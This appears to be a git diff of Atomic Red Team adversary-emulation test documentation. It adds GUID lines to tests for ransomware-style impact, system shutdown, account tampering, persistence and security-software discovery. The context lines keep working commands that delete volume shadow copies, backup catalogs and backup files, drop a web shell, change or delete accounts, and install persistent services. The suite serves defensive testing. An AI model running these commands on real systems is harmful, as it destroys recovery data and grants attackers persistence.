## Atomic Test #1 - Windows - Delete Volume Shadow Copies + +auto_generated_guid: 43819286-91a9-4369-90ed-d31fb4da2c01 + Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution, if no shadow volumes exist the message "No items found that satisfy the query." will be displayed. If shadow volumes are present, it will delete them without printing output to the screen. This is because the /quiet parameter was passed which also suppresses the y/n confirmation prompt. Shadow copies can only be created on Windows server or Windows 8. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc788055(v=ws.11) - **Supported Platforms:** Windows @@ -56,7 +58,7 @@ vssadmin.exe delete shadows /all /quiet ##### Description: Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8. ##### Check Prereq Commands: ```powershell -if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 } +if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -70,9 +72,11 @@ vssadmin.exe create shadow /for=c:
## Atomic Test #2 - Windows - Delete Volume Shadow Copies via WMI + +auto_generated_guid: 6a3ff8dd-f49c-4272-a658-11c2fe58bd88 + Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Shadow copies can only be created on Windows server or Windows 8. - **Supported Platforms:** Windows @@ -95,9 +99,11 @@ wmic.exe shadowcopy delete
## Atomic Test #3 - Windows - wbadmin Delete Windows Backup Catalog + +auto_generated_guid: 263ba6cb-ea2b-41c9-9d4e-b652dadd002c + Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution, "The backup catalog has been successfully deleted." will be displayed in the PowerShell session. - **Supported Platforms:** Windows @@ -120,9 +126,11 @@ wbadmin delete catalog -quiet
## Atomic Test #4 - Windows - Disable Windows Recovery Console Repair + +auto_generated_guid: cf21060a-80b3-4238-a595-22525de4ab81 + Disables repair by the Windows Recovery Console on boot. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution, "The operation completed successfully." will be displayed in the powershell session. - **Supported Platforms:** Windows @@ -151,11 +159,13 @@ bcdedit.exe /set {default} recoveryenabled yes >nul 2>&1
## Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell + +auto_generated_guid: 39a295ca-7059-4a88-86f6-09556c1211e7 + Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil. Executes Get-WMIObject. Shadow copies can only be created on Windows server or Windows 8, so upon execution there may be no output displayed. - **Supported Platforms:** Windows @@ -178,9 +188,11 @@ Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
## Atomic Test #6 - Windows - Delete Backup Files + +auto_generated_guid: 6b1dbaf6-cc8a-4ea6-891f-6058569653bf + Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try to delete files from around the system. - **Supported Platforms:** Windows @@ -203,8 +215,10 @@ del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\back
## Atomic Test #7 - Windows - wbadmin Delete systemstatebackup -Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled. +auto_generated_guid: 584331dd-75bc-4c02-9e0b-17f5fd81c748 + +Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled. **Supported Platforms:** Windows diff --git a/atomics/T1491.001/T1491.001.md b/atomics/T1491.001/T1491.001.md index ff394927..83a87102 100644 --- a/atomics/T1491.001/T1491.001.md +++ b/atomics/T1491.001/T1491.001.md @@ -10,15 +10,17 @@
## Atomic Test #1 - Replace Desktop Wallpaper -Downloads an image from a URL and sets it as the desktop wallpaper. +auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3 + +Downloads an image from a URL and sets it as the desktop wallpaper. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | url_of_wallpaper | URL pointing to the image file you wish to set as wallpaper | url | https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png| | pointer_to_orginal_wallpaper | Full path to where a file containing the original wallpaper location will be saved | String | $env:TEMP\T1491.001-OrginalWallpaperLocation| diff --git a/atomics/T1496/T1496.md b/atomics/T1496/T1496.md index 39645569..714d567e 100644 --- a/atomics/T1496/T1496.md +++ b/atomics/T1496/T1496.md @@ -14,9 +14,11 @@ Additionally, some cryptocurrency mining malware kills off processes for competi
## Atomic Test #1 - macOS/Linux - Simulate CPU Load with Yes + +auto_generated_guid: 904a5a0e-fb02-490d-9f8d-0e256eb37549 + This test simulates a high CPU load as you might observe during cryptojacking attacks. End the test by using CTRL/CMD+C to break. - **Supported Platforms:** macOS, Linux diff --git a/atomics/T1497.001/T1497.001.md b/atomics/T1497.001/T1497.001.md index 055376e4..86ae11ca 100644 --- a/atomics/T1497.001/T1497.001.md +++ b/atomics/T1497.001/T1497.001.md @@ -22,9 +22,11 @@ Hardware checks, such as the presence of the fan, temperature, and audio devices
## Atomic Test #1 - Detect Virtualization Environment (Linux) + +auto_generated_guid: dfbd1a21-540d-4574-9731-e852bd6fe840 + systemd-detect-virt detects execution in a virtualized environment. At boot, dmesg stores a log if a hypervisor is detected. - **Supported Platforms:** Linux @@ -47,8 +49,10 @@ if (systemd-detect-virt || sudo dmidecode | egrep -i 'manufacturer|product|vendo
## Atomic Test #2 - Detect Virtualization Environment (Windows) -Windows Management Instrumentation(WMI) objects contains system information which helps to detect virtualization. This command will specifically attempt to get the CurrentTemperature value from this object and will check to see if the attempt results in an error that contains the word supported. This is meant to find the result of Not supported, which is the result if run in a virtual machine +auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d + +Windows Management Instrumentation(WMI) objects contains system information which helps to detect virtualization. This command will specifically attempt to get the CurrentTemperature value from this object and will check to see if the attempt results in an error that contains the word supported. This is meant to find the result of Not supported, which is the result if run in a virtual machine **Supported Platforms:** Windows @@ -77,8 +81,10 @@ $error.clear()
## Atomic Test #3 - Detect Virtualization Environment (MacOS) -ioreg contains registry entries for all the device drivers in the system. If it's a virtual machine, one of the device manufacturer will be a Virtualization Software. +auto_generated_guid: a960185f-aef6-4547-8350-d1ce16680d09 + +ioreg contains registry entries for all the device drivers in the system. If it's a virtual machine, one of the device manufacturer will be a Virtualization Software. **Supported Platforms:** macOS diff --git a/atomics/T1505.002/T1505.002.md b/atomics/T1505.002/T1505.002.md index 974d261b..7e3386e2 100644 --- a/atomics/T1505.002/T1505.002.md +++ b/atomics/T1505.002/T1505.002.md @@ -12,16 +12,18 @@ Adversaries may register a malicious transport agent to provide a persistence me
## Atomic Test #1 - Install MS Exchange Transport Agent Persistence + +auto_generated_guid: 43e92449-ff60-46e9-83a3-1a38089df94d + Install a Microsoft Exchange Transport Agent for persistence. This requires execution from an Exchange Client Access Server and the creation of a DLL with specific exports. Seen in use by Turla. More details- https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | class_factory | Class factory of transport agent. | string | Microsoft.Exchange.Security.Interop.SecurityInteropAgentFactory| | dll_path | Path of DLL to use as transport agent. | path | c:\program files\microsoft\Exchange Server\v15\bin\Microsoft.Exchange.Security.Interop.dll| @@ -52,7 +54,7 @@ if(Get-Command "Get-TransportAgent" -ErrorAction Ignore){ ##### Description: Microsoft Exchange SnapIn must be installed ##### Check Prereq Commands: ```powershell -Get-TransportAgent -TransportService FrontEnd +Get-TransportAgent -TransportService FrontEnd ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1505.003/T1505.003.md b/atomics/T1505.003/T1505.003.md index d10a868f..1a3d7bbd 100644 --- a/atomics/T1505.003/T1505.003.md +++ b/atomics/T1505.003/T1505.003.md @@ -12,17 +12,19 @@ In addition to a server-side script, a Web shell may have a client interface pro
## Atomic Test #1 - Web Shell Written to Disk + +auto_generated_guid: 0a2ce662-1efa-496f-a472-2fe7b080db16 + This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | web_shell_path | The path to drop the web shell | string | C:\inetpub\wwwroot| | web_shells | Path of Web Shell | path | PathToAtomicsFolder\T1505.003\src\| @@ -48,7 +50,7 @@ del #{web_shell_path}\cmd.aspx /q >nul 2>&1 ##### Description: Web shell must exist on disk at specified location (#{web_shells}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{web_shells}) {exit 0} else {exit 1} +if (Test-Path #{web_shells}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1518.001/T1518.001.md b/atomics/T1518.001/T1518.001.md index 774a3286..230fdbef 100644 --- a/atomics/T1518.001/T1518.001.md +++ b/atomics/T1518.001/T1518.001.md @@ -24,11 +24,13 @@ Adversaries may also utilize cloud APIs to discover the configurations of firewa
## Atomic Test #1 - Security Software Discovery + +auto_generated_guid: f92a380f-ced9-491f-b338-95a991418ce2 + Methods to identify Security Software on an endpoint when sucessfully executed, the test is going to display running processes, firewall configuration on network profiles and specific security software. - **Supported Platforms:** Windows @@ -56,10 +58,12 @@ tasklist.exe | findstr /i cylance
## Atomic Test #2 - Security Software Discovery - powershell + +auto_generated_guid: 7f566051-f033-49fb-89de-b6bacab730f0 + Methods to identify Security Software on an endpoint when sucessfully executed, powershell is going to processes related AV products if they are running. - **Supported Platforms:** Windows @@ -85,9 +89,11 @@ get-process | ?{$_.Description -like "*cylance*"}
## Atomic Test #3 - Security Software Discovery - ps (macOS) + +auto_generated_guid: ba62ce11-e820-485f-9c17-6f3c857cd840 + Methods to identify Security Software on an endpoint when sucessfully executed, command shell is going to display AV/Security software it is running. - **Supported Platforms:** macOS @@ -110,9 +116,11 @@ ps aux | egrep 'Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefen
## Atomic Test #4 - Security Software Discovery - ps (Linux) + +auto_generated_guid: 23b91cd2-c99c-4002-9e41-317c63e024a2 + Methods to identify Security Software on an endpoint when sucessfully executed, command shell is going to display AV/Security software it is running. - **Supported Platforms:** Linux @@ -135,10 +143,12 @@ ps aux | egrep 'falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|
## Atomic Test #5 - Security Software Discovery - Sysmon Service + +auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9 + Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed). when sucessfully executed, the test is going to display sysmon driver instance if it is installed. - **Supported Platforms:** Windows @@ -161,10 +171,12 @@ fltmc.exe | findstr.exe 385201
## Atomic Test #6 - Security Software Discovery - AV Discovery via WMI + +auto_generated_guid: 1553252f-14ea-4d3b-8a08-d7a4211aa945 + Discovery of installed antivirus products via a WMI query. when sucessfully executed, the test is going to display installed AV software. - **Supported Platforms:** Windows diff --git a/atomics/T1518/T1518.md b/atomics/T1518/T1518.md index 7925bb5f..3dbb4789 100644 --- a/atomics/T1518/T1518.md +++ b/atomics/T1518/T1518.md @@ -16,9 +16,11 @@ Adversaries may attempt to enumerate software for a variety of reasons, such as
## Atomic Test #1 - Find and Display Internet Explorer Browser Version + +auto_generated_guid: 68981660-6670-47ee-a5fa-7e74806420a4 + Query the registry to determine the version of internet explorer installed on the system. Upon execution, version information about internet explorer will be displayed. - **Supported Platforms:** Windows @@ -41,9 +43,11 @@ reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersio
## Atomic Test #2 - Applications Installed + +auto_generated_guid: c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b + Query the registry to determine software and versions installed on the system. Upon execution a table of software name and version information will be displayed. - **Supported Platforms:** Windows @@ -67,8 +71,10 @@ Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uni
## Atomic Test #3 - Find and Display Safari Browser Version -Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors +auto_generated_guid: 103d6533-fd2a-4d08-976a-4a598565280f + +Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors **Supported Platforms:** macOS diff --git a/atomics/T1529/T1529.md b/atomics/T1529/T1529.md index 15aa0390..1a223ec8 100644 --- a/atomics/T1529/T1529.md +++ b/atomics/T1529/T1529.md @@ -28,15 +28,17 @@ Adversaries may attempt to shutdown/reboot a system after impacting it in other
## Atomic Test #1 - Shutdown System - Windows -This test shuts down a Windows system. +auto_generated_guid: ad254fa8-45c0-403b-8c77-e00b3d3e7a64 + +This test shuts down a Windows system. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | timeout | Timeout period before shutdown (seconds) | string | 1| @@ -57,15 +59,17 @@ shutdown /s /t #{timeout}
## Atomic Test #2 - Restart System - Windows -This test restarts a Windows system. +auto_generated_guid: f4648f0d-bf78-483c-bafc-3ec99cd1c302 + +This test restarts a Windows system. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | timeout | Timeout period before restart (seconds) | string | 1| @@ -86,15 +90,17 @@ shutdown /r /t #{timeout}
## Atomic Test #3 - Restart System via `shutdown` - macOS/Linux -This test restarts a macOS/Linux system. +auto_generated_guid: 6326dbc4-444b-4c04-88f4-27e94d0327cb + +This test restarts a macOS/Linux system. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | timeout | Time to restart (can be minutes or specific time) | string | now| @@ -115,15 +121,17 @@ shutdown -r #{timeout}
## Atomic Test #4 - Shutdown System via `shutdown` - macOS/Linux -This test shuts down a macOS/Linux system using a halt. +auto_generated_guid: 4963a81e-a3ad-4f02-adda-812343b351de + +This test shuts down a macOS/Linux system using a halt. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | timeout | Time to shutdown (can be minutes or specific time) | string | now| @@ -144,8 +152,10 @@ shutdown -h #{timeout}
## Atomic Test #5 - Restart System via `reboot` - macOS/Linux -This test restarts a macOS/Linux system via `reboot`. +auto_generated_guid: 47d0b042-a918-40ab-8cf9-150ffe919027 + +This test restarts a macOS/Linux system via `reboot`. **Supported Platforms:** macOS, Linux @@ -168,8 +178,10 @@ reboot
## Atomic Test #6 - Shutdown System via `halt` - Linux -This test shuts down a Linux system using `halt`. +auto_generated_guid: 918f70ab-e1ef-49ff-bc57-b27021df84dd + +This test shuts down a Linux system using `halt`. **Supported Platforms:** Linux @@ -192,8 +204,10 @@ halt -p
## Atomic Test #7 - Reboot System via `halt` - Linux -This test restarts a Linux system using `halt`. +auto_generated_guid: 78f92e14-f1e9-4446-b3e9-f1b921f2459e + +This test restarts a Linux system using `halt`. **Supported Platforms:** Linux @@ -216,8 +230,10 @@ halt --reboot
## Atomic Test #8 - Shutdown System via `poweroff` - Linux -This test shuts down a Linux system using `poweroff`. +auto_generated_guid: 73a90cd2-48a2-4ac5-8594-2af35fa909fa + +This test shuts down a Linux system using `poweroff`. **Supported Platforms:** Linux @@ -240,8 +256,10 @@ poweroff
## Atomic Test #9 - Reboot System via `poweroff` - Linux -This test restarts a Linux system using `poweroff`. +auto_generated_guid: 61303105-ff60-427b-999e-efb90b314e41 + +This test restarts a Linux system using `poweroff`. **Supported Platforms:** Linux diff --git a/atomics/T1531/T1531.md b/atomics/T1531/T1531.md index 025c33ba..a5dba7da 100644 --- a/atomics/T1531/T1531.md +++ b/atomics/T1531/T1531.md @@ -16,16 +16,18 @@ Adversaries may also subsequently log off and/or reboot boxes to set malicious c
## Atomic Test #1 - Change User Password - Windows + +auto_generated_guid: 1b99ef28-f83c-4ec5-8a08-1a56263a5bb2 + Changes the user password to hinder access attempts. Seen in use by LockerGoga. Upon execution, log into the user account "AtomicAdministrator" with the password "HuHuHUHoHo283283". - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_account | User account whose password will be changed. | string | AtomicAdministrator| | new_user_password | Password to use if user account must be created first | string | User2ChangePW!| @@ -53,15 +55,17 @@ net.exe user #{user_account} /delete >nul 2>&1
## Atomic Test #2 - Delete User - Windows -Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted. +auto_generated_guid: f21a1d7d-a62f-442a-8c3a-2440d43b19e5 + +Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | new_user_password | Password to use if user account must be created first | string | User2DeletePW!| | user_account | User account to be deleted. | string | AtomicUser| @@ -84,15 +88,17 @@ net.exe user #{user_account} /delete
## Atomic Test #3 - Remove Account From Domain Admin Group -This test will remove an account from the domain admins group +auto_generated_guid: 43f71395-6c37-498e-ab17-897d814a0947 + +This test will remove an account from the domain admins group **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | super_user | Account used to run the execution command (must include domain). | string | domain\super_user| | super_pass | super_user account password. | string | password| @@ -119,7 +125,7 @@ if((Get-ADUser #{remove_user} -Properties memberof).memberof -like "CN=Domain Ad ##### Description: Requires the Active Directory module for powershell to be installed. ##### Check Prereq Commands: ```powershell -if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} +if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1543.001/T1543.001.md b/atomics/T1543.001/T1543.001.md index 9eecc4dd..33f7a5b3 100644 --- a/atomics/T1543.001/T1543.001.md +++ b/atomics/T1543.001/T1543.001.md @@ -12,15 +12,17 @@ Adversaries may install a new launch agent that can be configured to execute at
## Atomic Test #1 - Launch Agent -Create a plist and execute it +auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 + +Create a plist and execute it **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | plist_filename | filename | string | com.atomicredteam.plist| | path_malicious_plist | Name of file to store in cron folder | string | $PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist| @@ -42,7 +44,7 @@ sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename} ##### Description: The shared library must exist on disk at specified location (#{path_malicious_plist}) ##### Check Prereq Commands: ```bash -if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; +if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```bash diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md index 44951c1c..cbb857ac 100644 --- a/atomics/T1543.002/T1543.002.md +++ b/atomics/T1543.002/T1543.002.md @@ -22,15 +22,17 @@ While adversaries typically require root privileges to create/modify service uni
## Atomic Test #1 - Create Systemd Service -This test creates a Systemd service unit file and enables it as a service. +auto_generated_guid: d9e4f24f-aa67-4c6e-bcbf-85622b697a7c + +This test creates a Systemd service unit file and enables it as a service. **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | systemd_service_path | Path to systemd service unit file | Path | /etc/systemd/system| | systemd_service_file | File name of systemd service unit file | String | art-systemd-service.service| @@ -81,8 +83,10 @@ systemctl daemon-reload
## Atomic Test #2 - Create Systemd Service file, Enable the service , Modify and Reload the service. -This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. +auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89 + +This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. **Supported Platforms:** Linux @@ -130,7 +134,7 @@ systemctl daemon-reload ##### Description: System must be Ubuntu ,Kali OR CentOS. ##### Check Prereq Commands: ```bash -if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi; +if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi; ``` ##### Get Prereq Commands: ```bash diff --git a/atomics/T1543.003/T1543.003.md b/atomics/T1543.003/T1543.003.md index 7dfa0832..616ccbd2 100644 --- a/atomics/T1543.003/T1543.003.md +++ b/atomics/T1543.003/T1543.003.md @@ -20,10 +20,12 @@ Services may be created with administrator privileges but are executed under SYS
## Atomic Test #1 - Modify Fax service to run PowerShell + +auto_generated_guid: ed366cde-7d12-49df-a833-671904770b9f + This test will temporarily modify the service Fax by changing the binPath to PowerShell and will then revert the binPath change, restoring Fax to its original state. Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn. - **Supported Platforms:** Windows @@ -51,16 +53,18 @@ sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul 2>&1
## Atomic Test #2 - Service Installation CMD + +auto_generated_guid: 981e2942-e433-44e9-afc1-8c957a1496b6 + Download an executable from github and start it as a service. Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | binary_path | Name of the service binary, include path. | Path | PathToAtomicsFolder\T1543.003\bin\AtomicService.exe| | service_name | Name of the Service | String | AtomicTestService_CMD| @@ -86,7 +90,7 @@ sc.exe delete #{service_name} >nul 2>&1 ##### Description: Service binary must exist on disk at specified location (#{binary_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{binary_path}) {exit 0} else {exit 1} +if (Test-Path #{binary_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -101,16 +105,18 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #3 - Service Installation PowerShell + +auto_generated_guid: 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 + Installs A Local Service via PowerShell. Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | binary_path | Name of the service binary, include path. | Path | PathToAtomicsFolder\T1543.003\bin\AtomicService.exe| | service_name | Name of the Service | String | AtomicTestService_PowerShell| @@ -137,7 +143,7 @@ catch {} ##### Description: Service binary must exist on disk at specified location (#{binary_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{binary_path}) {exit 0} else {exit 1} +if (Test-Path #{binary_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1543.004/T1543.004.md b/atomics/T1543.004/T1543.004.md index cae1c5d4..c8f5977d 100644 --- a/atomics/T1543.004/T1543.004.md +++ b/atomics/T1543.004/T1543.004.md @@ -14,15 +14,17 @@ The plist file permissions must be root:wheel, but the script or program that it
## Atomic Test #1 - Launch Daemon -Utilize LaunchDaemon to launch `Hello World` +auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf + +Utilize LaunchDaemon to launch `Hello World` **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | plist_filename | filename | string | com.atomicredteam.plist| | path_malicious_plist | Name of file to store in cron folder | string | $PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist| @@ -43,7 +45,7 @@ sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename} ##### Description: The shared library must exist on disk at specified location (#{path_malicious_plist}) ##### Check Prereq Commands: ```bash -if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; +if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```bash diff --git a/atomics/T1546.001/T1546.001.md b/atomics/T1546.001/T1546.001.md index 14d91955..41cc789d 100644 --- a/atomics/T1546.001/T1546.001.md +++ b/atomics/T1546.001/T1546.001.md @@ -17,17 +17,19 @@ The values of the keys listed are commands that are executed when the handler op
## Atomic Test #1 - Change Default File Association + +auto_generated_guid: 10a08978-2045-4d62-8c42-1957bbbea102 + Change Default File Association From cmd.exe of hta to notepad. Upon successful execution, cmd.exe will change the file association of .hta to notepad.exe. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_extension_handler | txtfile maps to notepad.exe | Path | txtfile| | extension_to_change | File Extension To Hijack | String | .hta| diff --git a/atomics/T1546.002/T1546.002.md b/atomics/T1546.002/T1546.002.md index 0677ca63..6b340f80 100644 --- a/atomics/T1546.002/T1546.002.md +++ b/atomics/T1546.002/T1546.002.md @@ -19,15 +19,17 @@ Adversaries can use screensaver settings to maintain persistence by setting the
## Atomic Test #1 - Set Arbitrary Binary as Screensaver -This test copies a binary into the Windows System32 folder and sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. +auto_generated_guid: 281201e7-de41-4dc9-b73d-f288938cbb64 + +This test copies a binary into the Windows System32 folder and sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_binary | Executable binary to use in place of screensaver for persistence | path | C:\Windows\System32\cmd.exe| diff --git a/atomics/T1546.003/T1546.003.md b/atomics/T1546.003/T1546.003.md index 8ea3551c..f94ca7be 100644 --- a/atomics/T1546.003/T1546.003.md +++ b/atomics/T1546.003/T1546.003.md @@ -14,6 +14,9 @@ WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe
## Atomic Test #1 - Persistence via WMI Event Subscription + +auto_generated_guid: 3c64f177-28e2-49eb-a799-d767b24dd1e0 + Run from an administrator powershell window. After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. @@ -22,7 +25,6 @@ Code references https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 - **Supported Platforms:** Windows diff --git a/atomics/T1546.004/T1546.004.md b/atomics/T1546.004/T1546.004.md index e45a0307..29f7920d 100644 --- a/atomics/T1546.004/T1546.004.md +++ b/atomics/T1546.004/T1546.004.md @@ -16,15 +16,17 @@ For macOS, the functionality of this technique is similar but may leverage zsh,
## Atomic Test #1 - Add command to .bash_profile -Adds a command to the .bash_profile file of the current user +auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f + +Adds a command to the .bash_profile file of the current user **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_to_add | Command to add to the .bash_profile file | string | /path/to/script.py| @@ -45,15 +47,17 @@ echo "#{command_to_add}" >> ~/.bash_profile
## Atomic Test #2 - Add command to .bashrc -Adds a command to the .bashrc file of the current user +auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f + +Adds a command to the .bashrc file of the current user **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_to_add | Command to add to the .bashrc file | string | /path/to/script.py| diff --git a/atomics/T1546.005/T1546.005.md b/atomics/T1546.005/T1546.005.md index fc801714..7c2f996c 100644 --- a/atomics/T1546.005/T1546.005.md +++ b/atomics/T1546.005/T1546.005.md @@ -12,9 +12,11 @@ Adversaries can use this to register code to be executed when the shell encounte
## Atomic Test #1 - Trap + +auto_generated_guid: a74b2e07-5952-4c03-8b56-56274b076b61 + After exiting the shell, the script will download and execute. After sending a keyboard interrupt (CTRL+C) the script will download and execute. - **Supported Platforms:** macOS, Linux diff --git a/atomics/T1546.007/T1546.007.md b/atomics/T1546.007/T1546.007.md index fb98bab9..374d1c09 100644 --- a/atomics/T1546.007/T1546.007.md +++ b/atomics/T1546.007/T1546.007.md @@ -12,15 +12,17 @@ Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code
